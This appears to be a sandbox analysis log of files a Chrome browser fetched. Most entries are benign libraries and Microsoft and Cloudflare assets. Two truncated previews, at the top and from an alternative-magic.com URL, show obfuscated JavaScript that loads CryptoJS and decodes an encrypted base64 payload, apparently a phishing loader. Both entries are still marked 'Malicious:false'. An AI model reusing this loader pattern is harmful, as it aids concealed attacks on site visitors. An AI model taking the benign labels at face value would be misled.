                                                                                              Preview: var lrMkLwnOXAhUnEZH = document.createElement("script");..lrMkLwnOXAhUnEZH.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(lrMkLwnOXAhUnEZH);..lrMkLwnOXAhUnEZH.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiYzY5dGpYa0VmcUczRVBOWUtQM3BkaEJHOXhXbkZuK2tBXC9RcmRoOEZKV1RYc0FBTndUcFRIUzZCWkM1WkcwaHQrOW1qbG03dzB1ZkRka3M4YWdrYUpUZXV4eHA1bFRMWGtFVDNwY3lpTGplbkRSTjI4UEdjK1ZGMitqaUN5aUE5YzNvZnRqQmhkbmFWTnNkdTJieGdpKzZPU1ZvQTNxSHRFTFwvcmxGN3BKZGt3UmVNMjlnK1VCVFA1bHRxcFNKZUZHcFJMY2Z4YStMZDFhSDdwZHVkNzREN1BRY3FBSGM0TklzcFpGWE1WeGpPOERRWm9QRnZXaWVTMTd2bWVHY0E2T3BISGtpSFNDUzBHUHRcL2JDaDd2QlpJdE1UN0JZTmJ6Qk01bGRLemFpUXBCY3FHNXFkek95VEZwbEtEbzhGMEY2ZndLRnQ1RlBrMnBPTGY4c0ZPVlVkZGNLYlYxampUVVdmc0o1Rzl3TFVnNVo1ZHNwXC90aHFFYXd3Ymw3VkVvQnJlcjBtZGpIQm0wQ0ZxaHNLcklkVXFLenF0aVJ1Vldvd21BODR2WVY1UzdVSkJiZUdTTTQ1T0JIWVwvdk5ZeVArc0hFTXhQV09uczFQdUFseVJ6XC9FY09QblR1a1hKRnJHXC9cL3NQcU1HVTNDK2xrQ0VNUVBkMU1vZkVzTkppOUFoRHBYSnFVbmxzTl
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 2 x 25, 8-bit/color RGB, non-interlaced
                                                                                              Category:downloaded
                                                                                              Size (bytes):61
                                                                                              Entropy (8bit):4.035372245524405
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:yionv//thPltSxr1xl/k4E08up:6v/lhPKv7Tp
                                                                                              MD5:2A99EECE4CAB56989A0A106220E62C46
                                                                                              SHA1:6861A1CCC4E1005A5E03DC28AD9E8D5EA25AB8F3
                                                                                              SHA-256:0036F76F6EB366160C94B2AD2CC8243B06C383291725C342F3AA3756A2712CE3
                                                                                              SHA-512:F98FEB40D5289B271A3B21A74887F965AF2C4BB9933E63166EB9CF9DC81B7B0667AA9161721B7967A9A033B748CBF442AD5B7FB38985F57BC5D25E7C5F3B4852
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f47c7718f624386/1734615364486/nxr05CllTeOlRC3
                                                                                              Preview:.PNG........IHDR...............h+....IDAT.....$.....IEND.B`.
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (41651)
                                                                                              Category:dropped
                                                                                              Size (bytes):131537
                                                                                              Entropy (8bit):5.2237799798561975
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:1f/HuF3CpxEIqQ0/9d1EwgXAnKxnKKviV:1f/HuZ1ILGV
                                                                                              MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                                                              SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                                                              SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                                                              SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                                                              Malicious:false
                                                                                              Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                              Category:downloaded
                                                                                              Size (bytes):89501
                                                                                              Entropy (8bit):5.289893677458563
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                              Malicious:false
                                                                                              URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (1381), with CRLF line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):2022
                                                                                              Entropy (8bit):5.968753038101936
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:o7bryM7q7zqAsKlH1q+dCrtTX4HtIaxc7ylbnWIuIGNiNbRGl+:odizqxKlVq+qEFc78bnLuI1GI
                                                                                              MD5:F9850E7BDE32FFF0F4CF28EB88010539
                                                                                              SHA1:77947CC72D0EB56873C9310A5F930074B1FE7697
                                                                                              SHA-256:A47BCB94C854247FECAB989F76B9EFB392280091175BF6ABDB96B495A50E4B49
                                                                                              SHA-512:BACE29818C83100525DC26F0638DB3F54A0BD58E76A2CFA383E1E6846792797D28E64E1C094CB75AF6D74F1C4B630FB67F8E7FC26DA520142F4C899F203E9B39
                                                                                              Malicious:false
                                                                                              URL:https://alternative-magic.com/res444.php?2-687474703a2f2f653478362e67757261746976657a2e72752f6848375f434c66573842303675445a62466d41694c772f-plumwood
                                                                                              Preview: var ykuZEhuNRFcEywcH = document.createElement("script");..ykuZEhuNRFcEywcH.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(ykuZEhuNRFcEywcH);..ykuZEhuNRFcEywcH.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiWXQ1UE0zcXFXSWdpMklUQ1UxUWpxU3NLSlVyaXI4QnBhQ0t4YW5CN2RpMkFRTHpQV2lcL3g2ZFdxSG1UVXZGYVFpNnM2T3pLUzZ2YmMyZEtcL2xzRXZpVEJYWmxJZ1NYZFpSbXFoTms2ekR1RzUxQlZcL1hlcWs1a3FQTk9OMnRDMndaSkpMbkdqblIycEVGTXpSUVhcL0NqNkhtNHo1MFdsUmUyeVIwdGlrM3p4dXJCRVlWNjhFMmdcL1A3blNlOVdiWlI3MXRHaG5PTWNLTHBtN1ExXC82cXNmcnM5MlVGSVwvQTFcL3E1VERqdko3bUxRXC81bEhoejRXSVdNRXY0TGh5aFFxTHlOaFJXTHlYaHhudHQrXC9KUXFUTk1HU1grbWY4ZFl0ODIwMG5HYXNNSXNuRzNBMUQxYkVsMDd1N2tTR0M5ODNja2RLcVhHT3VUWkpTNFVxNzVoZmJ1TUxQT1ZNYjlNUzV2NHRScDh1cWhnUFltTEdWTXY3N1JvdDZ5SnU5cEVMRVwvMjBiTFdBXC9MVEJVR0xkbFwvek1HbENaTnNyTXVRUHhwVUNvVytQKzRcL2lKWUkydUdkZitXSkdOOFwvWDdNQitaSUtkN2RWNVVMeHdHUTUraTJ0T1wvZmdOWjlYeVVLZSszYlRuWFAwVXRvK2dINzY1ZG82ZStRVWJZM011VWN1aG1FOF
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                              Category:downloaded
                                                                                              Size (bytes):17174
                                                                                              Entropy (8bit):2.9129715116732746
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                              Malicious:false
                                                                                              URL:https://www.microsoft.com/favicon.ico?v2
                                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):48316
                                                                                              Entropy (8bit):5.6346993394709
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                              Malicious:false
                                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):47992
                                                                                              Entropy (8bit):5.605846858683577
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                              MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                              SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                              SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                              SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                              Malicious:false
                                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:HTML document, ASCII text, with very long lines (955), with CRLF line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):201253
                                                                                              Entropy (8bit):2.661810841903416
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:W7nJSq9GinOo20uqxjr3+AKyKEAPNPPn8P9R/3htzAVT+JcYY5WRItsWc7rQ3S01:WHGiOoHuOjr3+AKyKAXS
                                                                                              MD5:85DE642E1467807F64F7E10807DF3869
                                                                                              SHA1:C795B490811C0E5A1A8F3C3F620AAB9F00C34F07
                                                                                              SHA-256:5965B2C5472AACA1CD66EA5B0D07A971B961FEE72FC27EB1F6C760042084B21B
                                                                                              SHA-512:BF4EC56D6FC54EAAFBD57C4E4D06900D358E39CE15009FB983491B0A83ABB60A0A54F46BE86387AB837B4AE1D1F3FF99156D04207065B0F65F165B54CFAAF47B
                                                                                              Malicious:false
                                                                                              URL:https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration
                                                                                              Preview:..<!DOCTYPE html><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext".. xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us".. xmlns="http://www.w3.org/1999/xhtml"><head><link rel="shortcut icon".. href="//www.microsoft.com/favicon.ico?v2" /><link.. type="text/css" rel="stylesheet".. href="https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css".. /><title>Your request has been blocked. This could be.. due to several reasons.</title><meta name="Title".. content="We are sorry, the page you requested cannot be.. found" /><meta name="CorrelationVector".. content="VbLZYbRlhU2hyedN.1" /><meta name="Description".. content="" /><meta name="MscomContentLocale".. content="en-us" /><meta name="
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                              Category:downloaded
                                                                                              Size (bytes):61
                                                                                              Entropy (8bit):3.990210155325004
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                              Malicious:false
                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):47992
                                                                                              Entropy (8bit):5.605846858683577
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                              MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                              SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                              SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                              SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                              Malicious:false
                                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):15
                                                                                              Entropy (8bit):3.189898095464287
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Uh1Kn:UDKn
                                                                                              MD5:39A19D0882684989864FA50BCED6A2D1
                                                                                              SHA1:5CED55DAC2E0427E9DC605CEC1FEDAB0949EB15E
                                                                                              SHA-256:8FBEDED073249C3611742297EE96A976A95EE113F33B9A422A5D3A7A2DEB63E5
                                                                                              SHA-512:E795CB7DE27B42948B7DDFF19F3B401A8F95753AC7D37D9B5F52D8DACD2AA43A2AD9EACEC29F77D28080E20C21C48B9FA88A733FAC108939FB2F0EB036C7AEEE
                                                                                              Malicious:false
                                                                                              URL:https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
                                                                                              Preview:/* empty css */
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (32089)
                                                                                              Category:dropped
                                                                                              Size (bytes):92629
                                                                                              Entropy (8bit):5.303443527492463
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:dnu00HWWaRxkqJg09pYxoxDKMXJrg8hXXO4dK3kyfiLJBhdSZE+I+Qg7rbaN1RUx:ddkWgoBhcZRQgmW42qe
                                                                                              MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                                              SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                                              SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                                              SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                                              Malicious:false
                                                                                              Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (47691)
                                                                                              Category:dropped
                                                                                              Size (bytes):47692
                                                                                              Entropy (8bit):5.4016459163756165
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                              MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                              SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                              SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                              SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                              Malicious:false
                                                                                              Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                              Category:downloaded
                                                                                              Size (bytes):4054
                                                                                              Entropy (8bit):7.797012573497454
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                                              MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                              SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                              SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                              SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                              Malicious:false
                                                                                              URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                                                                                              Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                              Category:dropped
                                                                                              Size (bytes):17174
                                                                                              Entropy (8bit):2.9129715116732746
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                              Malicious:false
